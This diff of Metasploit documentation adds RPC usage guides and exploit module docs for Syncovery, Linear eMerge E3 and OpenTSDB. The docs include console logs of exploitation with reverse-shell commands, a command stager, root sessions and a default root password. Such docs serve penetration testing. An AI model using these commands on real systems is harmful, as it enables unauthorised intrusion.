+  "jsonrpc": "2.0",
+  "result": {
+    "job_id": 0,
+    "uuid": "1MIqJ5lViZHSOuaWf1Zz1lpR"
+  },
+  "id": 1
+}
+```
+
+#### query all running stats
+
+Request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "module.running_stats",
+    "id": 1,
+    "params": []
+}'
+```
+
+The response will include the following keys:
+- waiting - modules that are queued up, but have not started to run yet
+- running - currently running modules
+- results - the module has completed or failed, and the results can be retrieved and acknowledged 
+
+Response:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "waiting": [
+      "NkJvf4kp4JxcuFCz7rjSuHL1",
+      "wRnMQuJ8gzMTp5CaHu18bHdV"      
+    ],
+    "running": [
+      "b7hIX6G4ZtwvRVRDOXk5ylSx",
+      "gx9xTEi6KlH5LJHauyhrHTBn",
+    ],
+    "results": [
+      "1MIqJ5lViZHSOuaWf1Zz1lpR",
+      "IN5PwYXrjqKfuekQt8cyCENK",
+      "Spd1xfgsCZXQABNh7UA3uB58",
+      "nRQw0bEvhFcXF0AxtVYOpQku"
+    ]
+  },
+  "id": 1
+}
+```
+
+#### retrieve module results
+
+It is possible to poll for module results using the id returned when running a module.
+
+Request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "module.results",
+    "id": 1,
+    "params": ["0L37lfcIQqyRK9aBTIVJB4H3"]
+}'
+```
+
+Example response when the module is has not yet complete:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "status": "running"  
+  },
+  "id": 1
+}
+```
+
+Example error response:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "status": "errored",
+    "error": "The connection with (192.168.123.13:443) timed out."
+  },
+  "id": 1
+}
+```
+
+Example success response:
+
+```json
+{
+    "jsonrpc": "2.0",
+    "result": {
+        "status": "completed",
+        "result": {
+            "code": "vulnerable",
+            "message": "The target is vulnerable.",
+            "reason": null,
+            "details": {
+                "os": "Windows 7 Enterprise 7601 Service Pack 1",
+                "arch": "x64"
+            }
+        }
+    },
+    "id": 1
+}
+```
+
+#### acknowledge module results
+
+This command will also allow Metasploit to remove the result resources from memory. Not acknowledging module results will lead to a memory leak,
+but the memory is limited to 35mb as the memory datastore used is implemented by [`ActiveSupport::Cache::MemoryStore`](https://github.com/rapid7/metasploit-framework/pull/13036/files#diff-6e31832215e40b17a184a7f7b82d2aabfbaa8d98fabb3c43033dd8579ad3caaeR102) 
+
+Request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "module.ack",
+    "id": 1,
+    "params": ["nRQw0bEvhFcXF0AxtVYOpQku"]
+}'
+```
+
+Response:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "success": true
+  },
+  "id": 1
+}
+```
+
+### Analyzing hosts workflow
+
+Metasploit supports an `analyze` command which suggests modules to run based on what a user has already learned and stored about a host.
+First report a host:
+
+```bash
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Authorization: Bearer ' \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "db.report_host",
+    "id": 1,
+    "params": [
+        {
+            "workspace": "default",
+            "host": "10.0.0.1",
+            "state": "alive",
+            "os_name": "Windows",
+            "os_flavor": "Enterprize",
+            "os_sp": "SP2",
+            "os_lang": "English",
+            "arch": "ARCH_X86",
+            "mac": "97-42-51-F2-A7-A7",
+            "scope": "eth2",
+            "virtual_host": "VMWare"
+        }    
+    ]
+}'
+
+# response: {"jsonrpc":"2.0","result":{"result":"success"},"id":1}
+```
+
+Report the host vulnerabilities:
+
+```bash
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Authorization: Bearer ' \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "db.report_vuln",
+    "id": 1,
+    "params": [
+        {
+            "workspace": "default",
+            "host": "10.0.0.1",
+            "name": "Exploit Name",
+            "info": "Human readable description of the vuln",
+            "refs": [
+                "CVE-2017-0143",
+                "CVE-2017-0144",
+                "CVE-2017-0145",
+                "CVE-2017-0146",
+                "CVE-2017-0147",
+                "CVE-2017-0148"
+            ]
+        }
+    ]
+}'
+
+# response: {"jsonrpc":"2.0","result":{"result":"success"},"id":1}
+```
+
+Run the analyze command:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Authorization: Bearer ' \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "db.analyze_host",
+    "id": 1,
+    "params": [
+        {
+            "workspace": "default",
+            "host": "10.0.0.1"
+        }
+    ]
+}'
+```
+
+Response:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "host": {
+      "address": "10.0.0.1",
+      "modules": [
+        {
+          "mtype": "exploit",
+          "mname": "exploit/windows/smb/ms17_010_eternalblue",
+          "state": "READY_FOR_TEST",
+          "description": "ready for testing",
+          "options": {
+            "invalid": [],
+            "missing": []
+          }
+        }
+      ]
+    }
+  },
+  "id": 1
+}
+```
+
+When analyzing a host, it is also possible to specify payload requirements for additional granularity:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Authorization: Bearer ' \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "db.analyze_host",
+    "id": 1,
+    "params": [
+        {
+            "workspace": "default",
+            "host": "10.0.0.1",
+            "payload": "payload/cmd/unix/reverse_bash"
+        }
+    ]
+}'
+```
@@ -0,0 +1,201 @@
+The RPC API enables you to programmatically drive the Metasploit Framework and commercial products using HTTP-based remote procedure call (RPC) services. An RPC service is a collection of message types and remote methods that provide a structured way for external applications to interact with web applications. You can use the RPC interface to locally or remotely execute Metasploit commands to perform basic tasks like running modules, communicating with the database, interacting with sessions, exporting data, and generating reports.
+
+The Metasploit products are written primarily in Ruby, which is the easiest way to use the remote API. However, in addition to Ruby, any language with support for HTTPS and MessagePack, such as Python, Java, and C, can be used to take advantage of the RPC API.
+
+There are currently two implementations of Metasploit's RPC:
+
+- HTTP and messagepack - covered by this guide
+- HTTP and JSON - covered by a separate guide
+
+Note that both the messagepack and JSON RPC services provide very similar operations, and it is worth reviewing both documents.
+
+## Starting the messagepack RPC Server
+
+Before you can use the RPC interface, you must start the RPC server. There are a couple of ways that you can start the server depending on the Metasploit product you are using. For this example we will use the MSFRPD Login Utility, but other methods can be found [here](https://docs.rapid7.com/metasploit/rpc-api).
+
+Use the follow command setting a username and password, current example uses `user` and `pass` retrospectively:
+
+```
+$ ruby msfrpcd -U <username> -P <pass> -f
+```
+
+## Connecting with the MSFRPC Login Utility
+
+The msfrpc login utility enables you to connect to the RPC server through msfrpcd. If you started the server using the msfrpcd tool, `cd`  into your framework directory, if you're a Framework user, or the `metasploit/apps/pro/msf3` directory if you are a Pro user, and run the following command to connect to the server:
+
+```
+$ ruby msfrpc -U <username> -P <pass> -a <ip address>
+```
+You can provide the following options:
+
+- `-P <opt>` - The password to access msfrpcd.
+- `-S` - Enables or disables SSL on the RPC socket. Set this value to true or false. SSL is on by default.
+- `-U <opt>` - The username to access msfrpcd.
+- `-a <opt>` - The address msfrpcd runs on.
+- `-p <opt>` - The port the msfrpc listens on. The default port is 55553.
+
+For example, if you want to connect to the local server, you can enter the following command:
+```
+$ ruby msfrpc -U user -P pass123 -a 127.0.0.1
+```
+
+Which returns the following response:
+
+```
+[*] exec: ruby msfrpc -U user -P pass123 -a 127.0.0.1
+
+[*] The 'rpc' object holds the RPC client interface
+[*] Use rpc.call('group.command') to make RPC calls
+```
+
+## RPC Workflow examples
+
+### Start the server
+
+Use the following command to run the server with a configured uesrname and password:
+
+```
+$ ruby msfrpcd -U user -P pass -f
+```
+
+### Start the client in second terminal tab
+
+Use the username and password set in the previous command to access the client:
+
+```
+# Start the client in second terminal tab
+$ ruby msfrpc -U user -P pass -a 0.0.0.0
+```
+
+An interactive prompt will open:
+
+```
+[*] The 'rpc' object holds the RPC client interface
+[*] Use rpc.call('group.command') to make RPC calls
+```
+
+### Commands
+
+Before looking at commands, we will list the options that can be pass into RPC calls:
+```
+--rpc-host HOST
+--rpc-port PORT
+--rpc-ssl <true|false>
+--rpc-uri URI
+--rpc-user USERNAME
+--rpc-pass PASSWORD
+--rpc-token TOKEN
+--rpc-config CONFIG-FILE
+--rpc-help
+```
+
+#### Auxiliary module example
+
+To execute the `scanner/smb/smb_enumshares` module:
+
+```
+>> rpc.call("module.execute", "auxiliary", "scanner/smb/smb_enumshares", {"RHOSTS" => "192.168.175.135", "SMBUSER" => "Administrator", "SMBPASS" => "Password1"})
+=> {"job_id"=>0, "uuid"=>"yJWES2Y6d4MRyfFLWjqhqvon"}
+```
+
+Note that the result returns the `job_id` and `uuid` - which can be used for tracking the module's progress.
+
+The arguments supplied are:
+
+- `"module.execute"` - The method you want to call against the module
+- `"auxiliary"` - the module type
+- `"scanner/smb/smb_enumshares"` - The specific module you want to run
+- `{"RHOSTS" => "192.168.175.135", "SMBUSER" => "Administrator", "SMBPASS" => "Password1"}` - The module's datastore options
+
+Query all running stats with:
+
+```
+>> rpc.call('module.running_stats')
+=> {"waiting"=>[], "running"=>[], "results"=>["yJWES2Y6d4MRyfFLWjqhqvon"]}
+```
+
+Note that the output contains the previous `uuid`, which has now been marked as completed.
+To view the module results for a given `UUID`:
+
+```
+>> rpc.call('module.results', 'yJWES2Y6d4MRyfFLWjqhqvon')
+=> {"status"=>"completed", "result"=>nil}
+```
+
+#### Listing current jobs/sessions
+
+To list the current jobs:
+
+```
+>> rpc.call('job.list')
+=> {"0"=>"Exploit: windows/smb/ms17_010_psexec"}
+```
+
+To list the current sessions:
+
+```
+>> rpc.call('session.list')
+=>
+{1=>
+  {"type"=>"meterpreter",
+   "tunnel_local"=>"192.168.8.125:4444",
+   "tunnel_peer"=>"192.168.8.125:63504",
+   "via_exploit"=>"exploit/windows/smb/psexec",
+   "via_payload"=>"payload/windows/meterpreter/reverse_tcp",
+   "desc"=>"Meterpreter",
+   "info"=>"NT AUTHORITY\\SYSTEM @ DC1",
+   "workspace"=>"false",
+   "session_host"=>"192.168.175.135",
+   "session_port"=>445,
+   "target_host"=>"192.168.175.135",
+   "username"=>"cgranleese",
+   "uuid"=>"hqtjjwgx",
+   "exploit_uuid"=>"hldyog8j",
+   "routes"=>"",
+   "arch"=>"x86",
+   "platform"=>"windows"}}
+```
+
+#### Killing sessions
+
+To stop an active session use the `session.stop` command and pass the session ID. To find the session ID you can use the `session.list` command. 
+
+```
+rpc.call('session.stop', 1)
+```
+
+### Example workflows
+
+Let's look at a some workflows using the commands we discussed above for a complete workflow.
+
+#### Auxiliary module workflow
+
+```
+[*] The 'rpc' object holds the RPC client interface 
+[*] Use rpc.call('group.command') to make RPC calls
+
+>> rpc.call("module.execute", "auxiliary", "scanner/smb/smb_enumshares", {"RHOSTS" => "xxx.xxx.xxx.xxx", "SMBUSER" => "user", "SMBPASS" => "password"})
+=> {"job_id"=>0, "uuid"=>"yJWES2Y6d4MRyfFLWjqhqvon"}
+>> rpc.call('module.running_stats')
+=> {"waiting"=>[], "running"=>[], "results"=>["yJWES2Y6d4MRyfFLWjqhqvon"]}
+>> rpc.call('module.results', 'yJWES2Y6d4MRyfFLWjqhqvon')
+=> {"status"=>"completed", "result"=>nil}
+```
+
+#### Exploit module workflow
+
+This workflow makes use of the `module.check` method to check if the target is vulnerable to the module's exploit:
+
+```
+[*] The 'rpc' object holds the RPC client interface 
+[*] Use rpc.call('group.command') to make RPC calls 
+
+>> rpc.call("module.check", "exploit", "windows/smb/ms17_010_psexec", {"RHOSTS" => xxx.xxx.xxx.xxx", "SMBUSER" => "user", "SMBPASS" => "password"}) 
+=> {"job_id"=>0, "uuid"=>"q3eewYtM3LqxuVN5ai1Wya3i"} 
+>> rpc.call('module.running_stats') 
+=> {"waiting"=>[], "running"=>[], "results"=>["q3eewYtM3LqxuVN5ai1Wya3i"]} 
+>> rpc.call('module.results', 'q3eewYtM3LqxuVN5ai1Wya3i') 
+=> {"status"=>"completed", "result"=>{"code"=>"vulnerable", "message"=>"The target is vulnerable.", "reason"=>nil, "details"=>{"os"=>"Windows 8.1 9600", "arch"=>"x64"}}}
+```
+
+The `module.result` calls shows that the target is vulnerable, and additional metadata about the target has been returned.
@@ -97,20 +97,24 @@ NAVIGATION_CONFIG = [
            nav_order: 2
          },
          {
-            path: 'How-to-use-msfvenom.md',
+            path: 'How-to-use-a-Metasploit-module-appropriately.md',
            nav_order: 3
          },
          {
-            path: 'How-to-use-a-Metasploit-module-appropriately.md'
+            path: 'How-payloads-work.md',
+            nav_order: 4
          },
          {
-            path: 'How-payloads-work.md'
+            path: 'Module-Documentation.md',
+            nav_order: 5
          },
          {
-            path: 'Module-Documentation.md'
+            path: 'How-to-use-a-reverse-shell-in-Metasploit.md',
+            nav_order: 6
          },
          {
-            path: 'How-to-use-a-reverse-shell-in-Metasploit.md'
+            path: 'How-to-use-msfvenom.md',
+            nav_order: 7
          },
        ]
      },
@@ -230,6 +234,18 @@ NAVIGATION_CONFIG = [
              },
            ]
          },
+          {
+            title: 'RPC',
+            folder: 'RPC',
+            children: [
+              {
+                path: 'How-to-use-Metasploit-Messagepack-RPC.md'
+              },
+              {
+                path: 'How-to-use-Metasploit-JSON-RPC.md'
+              },
+            ]
+          },
        ]
      },
      {
@@ -0,0 +1,77 @@
+## Vulnerable Application
+[Syncovery For Linux with Web-GUI](https://www.syncovery.com/download/linux/)
+
+This module attempts to brute-force a valid session token for the Syncovery File Sync & Backup Software Web-GUI
+by generating all possible tokens, for every second between 'DateTime.now' and the given X day(s).
+By default today and yesterday (DAYS = 1) will be checked. If a valid session token is found, the module stops.
+The vulnerability exists, because in Syncovery session tokens are basically just `base64(m/d/Y H:M:S)` at the time
+of the login instead of a random token.
+If a user does not logout, the token stays valid until next reboot. Note that the mobile version of the WEB GUI
+as well as the obsolete branch 8 of Syncovery do not have a logout button.
+
+This affects Syncovery for Linux before v9.48j and all versions of the obsolete branch 8.
+
+### Setup
+
+Installing a vulnerable version of Syncovery for Linux to test this vulnerability is quite easy.
+Download a vulnerable version of Syncovery for Linux: https://www.syncovery.com/release/Syncovery-9.47a-amd64.deb
+Install it and once the server is up, you can access it on port 8999 for testing...
+
+## Authors
+
+- Jan Rude (mgm security partners GmbH)
+
+## Platforms
+
+- Unix
+
+## Verification Steps
+
+1. `use auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536`
+2. `set RHOSTS <TARGET HOSTS>`
+3. `run`
+5. On success you should get a valid token.
+
+## Options
+
+### TARGETURI
+The path to Syncovery login mask.
+
+### PORT
+The (TCP) target port on which Syncovery is running. By default port 8999 is used for HTTP and port 8943 is used for HTTPS.
+
+## Scenarios
+
+### Syncovery for Linux with default credentials
+
+```
+msf6 > use auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536
+msf6 auxiliary(scanner/http/syncovery_linux_token_cve_2022_36536) > set rhosts 192.168.178.26
+rhosts => 192.168.178.26
+msf6 auxiliary(scanner/http/syncovery_linux_token_cve_2022_36536) > options
+
+Module options (auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   DAYS       1                yes       Check today and last X day(s) for valid session token
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.178.26   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      8999             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                no        The path to Syncovery
+   THREADS    1                yes       The number of concurrent threads (max one per host)
+   VHOST                       no        HTTP server virtual host
+
+msf6 auxiliary(scanner/http/syncovery_linux_token_cve_2022_36536) > check
+[+] 192.168.178.26:8999 - The target is vulnerable.
+msf6 auxiliary(scanner/http/syncovery_linux_token_cve_2022_36536) > run
+
+[*] 192.168.178.26:8999 - Starting Brute-Forcer
+[+] 192.168.178.26:8999 - Valid token found: 'MDkvMDYvMjAyMiAxMzo0NDoxMg=='
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+## Limitations
+In Syncovery v9.x tokens get invalidated after the user logs out. In this case no valid token can be found.
@@ -0,0 +1,184 @@
+## Vulnerable Application
+
+Nortek Security & Control, LLC (NSC) is a leader in wireless security, home automation and personal safety systems and devices.
+The eMerge E3-Series is part of Linear’s access control platform, that delivers entry-level access control to buildings.
+It is a web based application where the HTTP web interface is typically exposed to the public internet.
+
+The Linear eMerge E3 versions `1.00-06` and below are vulnerable to unauthenticated command injection in card_scan_decoder.php
+via the  `No` and `door` HTTP GET parameter. Successful exploitation results in command execution as the root user.
+
+Building automation and access control systems are at the heart of many critical infrastructures, and their security is vital.
+Executing attacks on these systems may enable unauthenticated attackers to access and manipulate doors, elevators, air-conditioning systems,
+cameras, boilers, lights, safety alarm systems within a building.
+
+This issue affects all Linear eMerge E3-Series with firmware versions up to and including `1.00-06`.
+
+Installing a vulnerable test bed requires a Linear eMerge E3-Series access controller with the vulnerable software loaded.
+
+This module has been tested against a Linear eMerge access controller with the specifications listed below:
+
+* Nortek Linear eMerge E3 Elite access controller
+* Firmware: `v1.00-03`
+
+## Verification Steps
+
+1. `use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-Unix command or 1-Linux Dropper>`
+1. `exploit`
+1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
+
+## Options
+### ROOT_PASSWORD
+The password of the `root` user on the target device. Defaults to `davestyle`, which is
+the default root password for Linear eMerge E3-Series devices.
+
+## Scenarios
+
+### Nortek Linear eMerge E3 Elite access controller bash reverse shell
+
+```
+msf6 > use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > options
+
+Module options (exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine
+                                       or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lport 4444
+lport => 4444
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set target 0
+target => 0
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.180:80 can be exploited.
+[*] Performing command injection test issuing a sleep command of 2 seconds.
+[*] Elapsed time: 3.16 seconds.
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing Unix Command with bash -c '0<&179-;exec 179<>/dev/tcp/192.168.100.7/4444;sh <&179 >&179 2>&179'
+[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54274) at 2022-12-01 18:51:54 +0000
+
+uname -a
+Linux cuckoo 3.14.54 #1 SMP PREEMPT Thu Dec 6 19:08:58 PST 2018 armv7l GNU/Linux
+whoami
+root
+exit
+```
+
+### Nortek Linear eMerge E3 Elite access controller meterpreter session
+
+```
+msf6 > use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256
+[*] Using configured payload linux/armle/meterpreter_reverse_tcp
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > options
+
+Module options (exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine
+                                       or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (linux/armle/meterpreter_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lport 4444
+lport => 4444
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set target 1
+target => 1
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.180:80 can be exploited.
+[*] Performing command injection test issuing a sleep command of 2 seconds.
+[*] Elapsed time: 3.18 seconds.
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing Linux Dropper
+[*] Using URL: http://192.168.100.7:8080/n6tUft9RrS
+[*] Client 127.0.0.1 (Wget) requested /n6tUft9RrS
+[*] Sending payload to 127.0.0.1 (Wget)
+[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:49448) at 2022-12-01 18:50:26 +0000
+[*] Command Stager progress - 100.00% done (125/125 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.100.180
+OS           :  (Linux 3.14.54)
+Architecture : armv7l
+BuildTuple   : armv5l-linux-musleabi
+Meterpreter  : armle/linux
+meterpreter > getuid
+Server username: root
+```
+
+## Limitations
+Due to the limitations of restricted `busybox` command implementation on the Linear eMerge E3 Access Controller, only a
+few unix command payloads will work such as `cmd/unix/reverse_bash` or `cmd/unix/reverse` (telnet).
+
@@ -0,0 +1,149 @@
+## Vulnerable Application
+This module exploits an unauthenticated command injection vulnerability in the yrange parameter
+in OpenTSDB through 2.4.0 (CVE-2020-35476) in order to achieve unauthenticated remote code execution as the root user.
+
+The module first attempts to obtain the OpenTSDB version via the api. If the version is 2.4.0 or lower,
+the module performs additional checks to obtain the configured metrics and aggregators.
+It then randomly selects one metric and one aggregator and uses those to instruct the target server to plot a graph.
+As part of this request, the yrange parameter is set to the payload, which will then be executed by the target if the latter is vulnerable.
+
+This module has been successfully tested against OpenTSDB version 2.3.0.
+
+## Installation Information
+OpenTSDB is open source software. Vulnerable releases are available [here](https://github.com/OpenTSDB/opentsdb/releases).
+Documentation and installation instructions are available [here](http://opentsdb.net/docs/build/html/index.html).
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use exploit/linux/http/opentsdb_yrange_cmd_injection`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set LHOST [IP]`
+5. Do: `set SRVHOST [IP]`
+6. Do: `exploit`
+
+## Options
+### TARGETURI
+The base path to OpenTSDB. The default value is `/`.
+
+## Targets
+```
+Id  Name
+--  ----
+0   Automatic (Unix In-Memory)
+1   Automatic (Linux Dropper)
+```
+
+## Scenarios
+### OpenTSDB 2.3.0 - Linux target
+```
+msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > options
+
+Module options (exploit/linux/http/opentsdb_yrange_cmd_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     10.10.1.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      4242             yes       The target port (TCP)
+   SRVHOST    10.10.1.30       yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0
+                                         .0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to OpenTSDB
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.10.1.30       yes       The listen address (an interface may be specified)
+   LPORT  1312             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Automatic (Linux Dropper)
+
+
+msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > run
+
+[*] Started reverse TCP handler on 10.10.1.30:1312
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The target is OpenTSDB version 2.3.0
+[*] Identified 25 configured metrics. Using metric MessagePrePublishingEvents.min
+[*] Identified 31 configured aggregators. Using aggregator sum
+[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1toCgoHJWgCAAUgieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/XeJKe.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/JIulg' < '/tmp/XeJKe.b64' ; chmod +x '/tmp/JIulg' ; '/tmp/JIulg' & sleep 2 ; rm -f '/tmp/JIulg' ; rm -f '/tmp/XeJKe.b64'"]
+[*] Transmitting intermediate stager...(106 bytes)
+[*] Sending stage (1017704 bytes) to 10.10.1.1
+[*] Command Stager progress - 100.00% done (773/773 bytes)
+[*] Meterpreter session 4 opened (10.10.1.30:1312 -> 10.10.1.1:47720) at 2022-11-24 19:27:06 +0000
+
+meterpreter > getuid
+Server username: root
+```
+
+### OpenTSDB 2.3.0 - Unix target
+```
+msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > options
+
+Module options (exploit/linux/http/opentsdb_yrange_cmd_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     10.10.1.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      4242             yes       The target port (TCP)
+   SRVHOST    10.10.1.30       yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0
+                                         .0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to OpenTSDB
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.10.1.30       yes       The listen address (an interface may be specified)
+   LPORT  1337             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic (Unix In-Memory)
+
+
+msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > run
+
+[+] sh -c '(sleep 3851|telnet 10.10.1.30 1337|while : ; do sh && break; done 2>&1|telnet 10.10.1.30 1337 >/dev/null 2>&1 &)'
+[*] Started reverse TCP double handler on 10.10.1.30:1337
